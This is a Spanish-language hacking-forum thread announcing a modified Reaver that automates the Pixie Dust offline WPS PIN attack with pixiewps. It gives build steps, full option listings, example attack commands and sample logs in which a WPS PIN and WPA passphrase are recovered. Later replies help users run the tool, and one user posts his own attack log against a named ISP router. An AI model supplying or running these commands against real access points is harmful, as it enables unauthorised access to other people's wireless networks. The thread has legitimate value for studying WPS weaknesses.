Foro de elhacker.net

Seguridad Informática => Hacking Wireless => Mensaje iniciado por: t6_x en 16 Abril 2015, 18:34 pm



Título: Reaver modfication for Pixie Dust Attack (pixiewps)
Publicado por: t6_x en 16 Abril 2015, 18:34 pm
Hola

DataHead y me hicieron modificaciones en reaver para hacer que el Pixie Dust Attack e probar el número de pin y automatizar todo el trabajo

Aquí está nuestra contribución

GitHub
https://github.com/t6x/reaver-wps-fork-t6x (https://github.com/t6x/reaver-wps-fork-t6x)



Overview

    reaver-wps-fork-t6x es una modificación hecho desde el tenedor de reaver (ht tps://code.google.com/p/reaver-wps-fork/)

    Esta versión modificada utiliza el ataque del Pixie Dust de encontrar el número de PIN correcto de wps offline

    El ataque se utiliza en esta versión fue desarrollada por Wiire (ht tps://github.com/wiire/pixiewps)



Install Required Libraries and Tools

    Libraries for reaver

      
Código:
sudo apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev

    Tools

      
Código:
You must have installed the pixiewps created by Wiire (ht tps://github.com/wiire/pixiewps)



Compile and Install

Código:
Build Reaver

      cd reaver-wps-fork-t6x-master
      cd src
      ./configure
      make

Install Reaver

      sudo make install



Usage - Reaver

Código:
Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
mod by DataHead

Required Arguments:
        -i, --interface=<wlan>          Name of the monitor-mode interface to use
        -b, --bssid=<mac>               BSSID of the target AP

Optional Arguments:
        -m, --mac=<mac>                 MAC of the host system
        -e, --essid=<ssid>              ESSID of the target AP
        -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
        -o, --out-file=<file>           Send output to a log file [stdout]
        -s, --session=<file>            Restore a previous session file
        -C, --exec=<command>            Execute the supplied command upon successful pin recovery
        -D, --daemonize                 Daemonize reaver
        -a, --auto                      Auto detect the best advanced options for the target AP
        -f, --fixed                     Disable channel hopping
        -5, --5ghz                      Use 5GHz 802.11 channels
        -v, --verbose                   Display non-critical warnings (-vv for more)
        -q, --quiet                     Only display critical messages
        -K, --pixie-dust                Test Pixie Dust [1] Basic(-S) [2] With E-Once(-S) [3] With PKR
        -Z, --no-auto-pass              Not run automatically reaver to get the password when the pixiewps retrieves the pin
        -h, --help                      Show help

Advanced Options:
        -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
        -d, --delay=<seconds>           Set the delay between pin attempts [1]
        -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
        -g, --max-attempts=<num>        Quit after num pin attempts
        -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
        -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
        -t, --timeout=<seconds>         Set the receive timeout period [5]
        -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
        -A, --no-associate              Do not associate with the AP (association must be done by another application)
        -N, --no-nacks                  Do not send NACK messages when out of order packets are received
        -S, --dh-small                  Use small DH keys to improve crack speed
        -L, --ignore-locks              Ignore locked state reported by the target AP
        -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
        -n, --nack                      Target AP always sends a NACK [Auto]
        -w, --win7                      Mimic a Windows 7 registrar [False]
        -X, --exhaustive                Set exhaustive mode from the beginning of the session [False]
        -1, --p1-index                  Set initial array index for the first half of the pin [False]
        -2, --p2-index                  Set initial array index for the second half of the pin [False]
        -P, --pixiedust-loop            Set Into PixieLoop mode ( doesnt send M4, and loops through to M3 [False]

Example:
        reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv -K 1



Usage - wash

Código:
Wash v1.5.1 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
mod by DataHead

Required Arguments:
        -i, --interface=<iface>              Interface to capture packets on
        -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files

Optional Arguments:
        -c, --channel=<num>                  Channel to listen on [auto]
        -o, --out-file=<file>                Write data to file
        -n, --probes=<num>                   Maximum number of probes to send to each AP in scan mode [15]
        -D, --daemonize                      Daemonize wash
        -C, --ignore-fcs                     Ignore frame checksum errors
        -5, --5ghz                           Use 5GHz 802.11 channels
        -s, --scan                           Use scan mode
        -u, --survey                         Use survey mode [default]
        -P, --file-output-piped              Output Piped x|y|z...
        -g, --get-chipset                    Output Piped and tries to read the chipset with reaver
        -h, --help                           Show help

Example:
        wash -i mon0



Example

Código:
Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>

[+] Switching mon0 to channel 1
[?] Restore previous session for A.:9.:D.:....:....:...? [n/Y] n
[+] Waiting for beacon from A.:9.:D.:....:....:...
[+] Associated with A.:9.:D.:....:....:.... (ESSID: ......)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c6:66:a6:72:37:6d:......
[P] PKE: 10:cf:cc:88:99:4b:15:de:a6:b3:26:fe:93:24:......
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[P] WPS Model Serial Number: A978FD123BC
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:......
[P] AuthKey: bf:68:34:b5:ce:e2:a1:24:dc:15:01:1c:78:9e:74:......
[+] Sending M2 message
[P] E-Hash1: 2e:d5:17:16:36:b8:c2:bb:d1:14:7c:18:cf:89:58:b8:1d:9d:39:......
[P] E-Hash2: 94:fb:41:53:55:b3:8e:1c:fe:2b:a3:9b:b5:82:11:......
[Pixie-Dust]
[Pixie-Dust]   [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [*] PSK1: dd:09:bd:24:......
[Pixie-Dust]   [*] PSK2: 77:e0:dd:00:......
[Pixie-Dust]   [+] WPS pin: 9178....
[Pixie-Dust]
[Pixie-Dust]   [*] Time taken: 0 s
[Pixie-Dust]
Running the reaver with the correct pin wait ...

[Reaver Test] BSSID: A.:9.:D.:3.:..:..
[Reaver Test] Channel: 1
[Reaver Test] [+] WPS PIN: '9178....'
[Reaver Test] [+] WPA PSK: '112233'
[Reaver Test] [+] AP SSID: '....'


Código:
# wash -i mon0 -g -c 2
XX:XX:XX:XX:XX:XX| 1|-68|1.0|No |AAA| D-Link| DIR-615
XX:XX:XX:XX:XX:XX| 1|-58|1.0|No |CCC| ASUSTeK Computer Inc.| RT-N56U



Cualquier problema o sugerencia por favor póngase en contacto conmigo


Título: Re: Reaver modfication for Pixie Dust Attack (pixiewps)
Publicado por: El_Andaluz en 17 Abril 2015, 00:54 am
Hola buenas me alegro mucho que lo hayas publicado aquí me descargue este programa en otro foro que vi que lo publicaste me gustaría saber como lo ejecuto en Wifislax 4.10.1 ? Gracias.


Título: Re: Reaver modfication for Pixie Dust Attack (pixiewps)
Publicado por: engel lex en 17 Abril 2015, 01:01 am
Hola buenas me alegro mucho que lo hayas publicado aquí me descargue este programa en otro foro que vi que lo publicaste me gustaría saber como lo ejecuto en Wifislax 4.10.1 ? Gracias.

Hola

DataHead y me hicieron modificaciones en reaver para hacer que el Pixie Dust Attack e probar el número de pin y automatizar todo el trabajo

Aquí está nuestra contribución

GitHub
https://github.com/t6x/reaver-wps-fork-t6x (https://github.com/t6x/reaver-wps-fork-t6x)



Overview

    reaver-wps-fork-t6x es una modificación hecho desde el tenedor de reaver (ht tps://code.google.com/p/reaver-wps-fork/)

    Esta versión modificada utiliza el ataque del Pixie Dust de encontrar el número de PIN correcto de wps offline

    El ataque se utiliza en esta versión fue desarrollada por Wiire (ht tps://github.com/wiire/pixiewps)



Install Required Libraries and Tools

    Libraries for reaver

     
Código:
sudo apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev

    Tools

     
Código:
You must have installed the pixiewps created by Wiire (ht tps://github.com/wiire/pixiewps)



Compile and Install

Código:
Build Reaver

      cd reaver-wps-fork-t6x-master
      cd src
      ./configure
      make

Install Reaver

      sudo make install


Título: Re: Reaver modfication for Pixie Dust Attack (pixiewps)
Publicado por: El_Andaluz en 17 Abril 2015, 01:59 am
Citar
Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
mod by DataHead

Required Arguments:
        -i, --interface=<wlan>          Name of the monitor-mode interface to use
        -b, --bssid=<mac>               BSSID of the target AP

Optional Arguments:
        -m, --mac=<mac>                 MAC of the host system
        -e, --essid=<ssid>              ESSID of the target AP
        -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
        -o, --out-file=<file>           Send output to a log file [stdout]
        -s, --session=<file>            Restore a previous session file
        -C, --exec=<command>            Execute the supplied command upon successful pin recovery
        -D, --daemonize                 Daemonize reaver
        -a, --auto                      Auto detect the best advanced options for the target AP
        -f, --fixed                     Disable channel hopping
        -5, --5ghz                      Use 5GHz 802.11 channels
        -v, --verbose                   Display non-critical warnings (-vv for more)
        -q, --quiet                     Only display critical messages
        -K, --pixie-dust                Test Pixie Dust [1] Basic(-S) [2] With E-Once(-S) [3] With PKR
        -Z, --no-auto-pass              Not run automatically reaver to get the password when the pixiewps retrieves the pin
        -h, --help                      Show help

Advanced Options:
        -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
        -d, --delay=<seconds>           Set the delay between pin attempts [1]
        -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
        -g, --max-attempts=<num>        Quit after num pin attempts
        -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures
       -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
        -t, --timeout=<seconds>         Set the receive timeout period [5]
        -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
        -A, --no-associate              Do not associate with the AP (association must be done by another application)
        -N, --no-nacks                  Do not send NACK messages when out of order packets are received
        -S, --dh-small                  Use small DH keys to improve crack speed
        -L, --ignore-locks              Ignore locked state reported by the target AP
        -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
        -n, --nack                      Target AP always sends a NACK [Auto]
        -w, --win7                      Mimic a Windows 7 registrar [False]
        -X, --exhaustive                Set exhaustive mode from the beginning of the session [False]
        -1, --p1-index                  Set initial array index for the first half of the pin [False]
        -2, --p2-index                  Set initial array index for the second half of the pin [False]
        -P, --pixiedust-loop            Set Into PixieLoop mode ( doesnt send M4, and loops through to M3 [False]

Example:
        reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv -K 1

Lo acabo de probar en Wifislax en la ultima versión me quedado hasta aquí angel lex pero se me olvidado poner lo de wash -i mon0, me quedado bloqueado mentalmente y no sabía  que hacer mas. No Existe alguna manera de hacer este Script en un archivo xzm y meterlo en la carpeta modulo del wifislax y ejecutarlo directamente sin tener que estar copiando y pegando código? Me parece un poco incomodo tener que hacer esto cada vez que meta el Pen boteado en mi portátil es lo que pienso yo.

Una duda que tengo si pongo Wash -i mon0 cual chipt se me activa la de interior de mi portátil o la externa en mi caso sería la Alfa ? Por que quiero que se active mi antena Alfa de exterior con este script.Saludos.


Título: Re: Reaver modfication for Pixie Dust Attack (pixiewps)
Publicado por: engel lex en 17 Abril 2015, 02:10 am
hazlo un .sh


es script bash normal, lo corres con sudo y debería ir bien :P

en tu wifislax para confirmar porque no se, escribe
Código:
which bash
y responderá algo como
Citar
/bin/bash

entonces, creas un archivo en blanco
la primera linea va a ser (el resultado de tu which)
Código
  1. #!/bin/bash


luego el resto de las lineas serán los comandos que hiciste
lo guardas, y le colocas .sh, luego abres consola y le das permisos de ejecución

Código
  1. chmod +x archivo.sh

ahí deberías tener eso listo


Título: Re: Reaver modfication for Pixie Dust Attack (pixiewps)
Publicado por: El_Andaluz en 17 Abril 2015, 14:08 pm
Bueno voy a explicar los pasos que he echo dado que no hay un archivo en xzm para que se ejecute mejor y mas rápido sin tener que estar instalando tantas cosas y metiendo tantos códigos.

Aquí tenéis los pasos que he seguido:

Primer paso he echo descomprimir el archivo en el escritorio de Wifislax:
(http://oi61.tinypic.com/33093qa.jpg)
(http://oi59.tinypic.com/2lw7zhj.jpg)
(http://oi57.tinypic.com/9k0bdc.jpg)
(http://oi58.tinypic.com/2pt8pit.jpg)
(http://oi57.tinypic.com/2n1vx95.jpg)
(http://oi62.tinypic.com/2ywifkz.jpg)

Lo raro de todo esto que os pongo y me salta errores que al final del todo me escanea las redes, pero luego no me hace mas nada mi pregunta es que es lo que echo mal ? Me estoy agobiando y tengo echo un lío que no se ni que hacer ya.


Título: Re: Reaver modfication for Pixie Dust Attack (pixiewps)
Publicado por: sanson en 17 Abril 2015, 14:40 pm
Hola

Y si quieres un xzm ¿por que no creas el modulo a partir del script?.  

http://foro.seguridadwireless.net/index.php?topic=44883.0

http://foro.seguridadwireless.net/index.php?topic=47093.0

http://foro.seguridadwireless.net/index.php?topic=52220.0

Creo que no tienes claro que es eso que tienes entre manos.  Wash , es el scaner de goda la vida para detectar redes con wps activado , no tiene nada mas que hacer , que mostrar las redes, el siguiente paso es copiar esos datos para usarlos con reaver (modificado o no) como siempre

Saludos


Título: Re: Reaver modfication for Pixie Dust Attack (pixiewps)
Publicado por: El_Andaluz en 17 Abril 2015, 16:03 pm
Hola buenas Sanson: Ya he intentado hacer un xzm desde Wifislax lo puedo hacer lo que pasa que luego no me funcionan por que le falta las dependencia, yo me hago un lio la verdad, siempre que intentado hacer algo de esto al final todo me sale mal, solo digo que es mas cómodo para todos hacer este script en un archivo xzm a mi me no sale bien si alguien sabe hacerlo se lo agradecería.

Citar
Creo que no tienes claro que es eso que tienes entre manos.  Wash , es el scaner de goda la vida para detectar redes con wps activado , no tiene nada mas que hacer , que mostrar las redes, el siguiente paso es copiar esos datos para usarlos con reaver (modificado o no) como siempre

Se supone que esto es el Reaver modificado después leo en otro sitio y ha aparece una herramienta parecía a esta y dice que es el reaver1.5 modificado, wash ya se que es para scanear las redes hasta hay llego lo que si te fijas en las imagines que te he puesto he echo algo mal me salta errores como si me faltara algo ? Estoy un perdido. :(

Pero que me estas diciendo que el script este solo sirve para mostrar las redes ?? Y luego copiarlo y pegar en el reaver normal ?? NO entiendo bien. :-(


Título: Re: Reaver modfication for Pixie Dust Attack (pixiewps)
Publicado por: sanson en 17 Abril 2015, 17:30 pm
Hola



Example:
        reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv -K 1

No,  te digo que cuando te ha escaneado , es porque has puesto el código de whash para que scanee y es lo que ha hecho , por eso cuando dices " y no hace nada mas" es que eso es lo que tiene que hacer.  

Esto es reaver modificado, para que con la información que o tiene del M1 M2..... El siguiente pin que pruebe , sea el quenerado por pixie y por tanto el bueno en las mac vulnerables

Saludos


Título: Re: Reaver modfication for Pixie Dust Attack (pixiewps)
Publicado por: El_Andaluz en 17 Abril 2015, 17:44 pm
Entonces lo que yo he echo esta mal o estas bien ? Yo lo que echo he mete todo los codigo uno por uno hasta llegar aquí

(http://oi62.tinypic.com/2ywifkz.jpg)

Pero solo me sale eso ya esta no me da el pin ni nada ahora que hago con eso no me dice nada eso lo mismo que me hace en el wifislax otras herramientas no se si me entiendes.

Y otra herramienta que he visto es esta que no se, si tiene que ver algo con esto que estamos hablando o es diferente. Esta el reaver t6x/reaver-wps-fork-t6x es modificado del reaver 1.5

hay dos reaver 1.5 modificado para pixiewps

reaver 1.5 modificado para pixiewps


https://www.youtube.com/watch?v=GRMyqGcbBWQ


Título: Re: Reaver modfication for Pixie Dust Attack (pixiewps)
Publicado por: sanson en 17 Abril 2015, 21:51 pm
Hola

 A ver . eso que tu metes , son variables , que por si sola no hacen nada.  

El poner

-k.  

O

-vv

O lo que sea , sin nada delante pues no vale de nada ¿pon lo que te e puesto en el ejemplo y funcionara .  lógicamente cambia mac por la que quieras etc.  

Vamos lo que es usar reaver.   Tienes que dejar deusar las herramientas automáticas y usar código así sabrás lo que estas haciendo.  

Los automatismos , son útiles para ciertas ocasiones y sobre todo para cuando sabes hacerlo ha manopla .   empezar por ahi , atrofia el cerebro

Saludos



Edito .

Hostia. Es que no había visto ese  video.    Por favor mira con detenimiento lo que estas haciendo .      


Por dios


Título: Re: Reaver modfication for Pixie Dust Attack (pixiewps)
Publicado por: El_Andaluz en 18 Abril 2015, 04:18 am
Citar
O lo que sea , sin nada delante pues no vale de nada ¿pon lo que te e puesto en el ejemplo y funcionara .  lógicamente cambia mac por la que quieras etc. 

Vamos lo que es usar reaver.   Tienes que dejar deusar las herramientas automáticas y usar código así sabrás lo que estas haciendo.   

Los automatismos , son útiles para ciertas ocasiones y sobre todo para cuando sabes hacerlo ha manopla .   empezar por ahi , atrofia el cerebro

Saludos

Es verdad tienes razón luego me lió y no se ni lo que hago con tantas herramienta que hay ya echas si tener que meter apenas códigos voy a fijarme mejor, y voy hacer como tu dices a ver si me funciona pero no se si te has fijado en las imágenes que te he puesto cuando he ido metiendo los código me salían como algunos errores pero se ejecuta el programa parece como si faltara algo mas pero por lo que tu me dices entonces lo estoy ejecutando bien el programa o eso creo.

Citar
Edito .

Hostia. Es que no había visto ese  video.    Por favor mira con detenimiento lo que estas haciendo . 

Lo del vídeo no tiene mucho que ver creo con esta herramienta pero lo he puesto por que me ha llamado la atención por que pone esto el reaver t6x/reaver-wps-fork-t6x es modificado del reaver 1.5 y es parecido al archivo que me he descargado aquí y es el mismo que ha echo esta herramienta t6x y esta versión nueva no viene dentro del wifislax que yo sepa es la primera vez que veo reaver 1.5 modificado.


Título: Re: Reaver modfication for Pixie Dust Attack (pixiewps)
Publicado por: fly7 en 26 Julio 2015, 03:37 am
Hola amigos, un Saludo, hize la prueba y sale asi:

 Hize la prueba y me salen el pke y la authkey, pero no sale ni la hash 1 ni la hash 2, en cambio sale WARNING: Failed to associate with E0:CE:C3:BC:6E:B0 (ESSID:

a que se debe esto? que el router no es vulnerable?



Título: Re: Reaver modfication for Pixie Dust Attack (pixiewps)
Publicado por: El_Andaluz en 26 Julio 2015, 05:19 am
Hola Fly7: Se puede deber a que la señal de tu router lo tengas un poco lejos y necesitas acercarte mas para poder asociarse de lo contrario te dará fallo.


Título: Re: Reaver modfication for Pixie Dust Attack (pixiewps)
Publicado por: fly7 en 29 Julio 2015, 21:25 pm
Hola Amigo, gracias por responder


pues ya me acerque bastante y la señal es excelente y me sigue apareciendo asi:

reaver -i wlan0mon -c 10 -b E0:CE:C3:BC:6E:B0 -vv -N -S

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire

  • Switching wlan0mon to channel 10
  • Waiting for beacon from E0:CE:C3:BC:6E:B0
  • Associated with E0:CE:C3:BC:6E:B0 (ESSID: Movistar_76201696)
  • Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
  • Trying pin 12345670.
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
[P] E-Nonce: 79:db:27:78:65:a4:c9:e9:03:d8:8d:32:70:55:b0:42
[P] PKE: e5:b0:a4:33:80:8e:b8:fa:23:da:cd:8d:63:7b:46:d4:aa:68:23:d6:5b:e3:c7:c4:f1:a9:b6:ad:e9:49:99:37:79:46:e3:bb:56:d9:b6:1d:1e:32:ef:bd:10:ca:b6:f8:e7:2f:df:16:04:85:10:a4:22:ef:18:dc:b2:13:a1:f1:a2:34:57:c3:9c:d4:ab:2f:b3:c2:b4:5d:6f:7b:d4:15:f2:86:72:5f:6a:0e:e3:e4:42:0f:50:cb:45:14:37:98:cb:ad:cd:17:5e:b0:eb:70:9a:0d:d1:5e:7a:3f:23:45:5c:92:63:3a:83:d8:2f:bf:12:2f:6b:35:e1:55:82:76:54:ed:bc:63:3e:34:95:0c:f0:5c:50:cc:60:ec:7f:b0:cf:f1:a4:60:08:e3:ce:6b:55:83:b1:f1:48:42:e1:52:9d:dc:26:a0:2f:c3:1c:16:fd:58:8e:8b:48:e0:1e:b7:e9:2c:c9:6b:56:71:04:46:a3:fa:95:9c:ef:82:00:8f
[P] WPS Manufacturer: Askey
[P] WPS Model Name: RTL8192CD
[P] WPS Model Number: RTA9211W
[P] Access Point Serial Number: TF14020037B7
  • Received M1 message
[P] R-Nonce: d8:53:63:1c:89:b4:bb:07:58:c2:a5:75:2a:d5:96:4e
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
[P] AuthKey: fd:a7:dd:92:6d:d8:1d:56:47:bd:99:19:2d:85:5b:5b:46:75:b5:8a:54:75:ff:f9:54:e7:60:57:34:b2:7f:34
  • Sending M2 message
  • Received WSC NACK
  • Sending WSC NACK
  • [!] WPS transaction failed (code: 0x04), re-trying last pin
  • Trying pin 12345670.
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request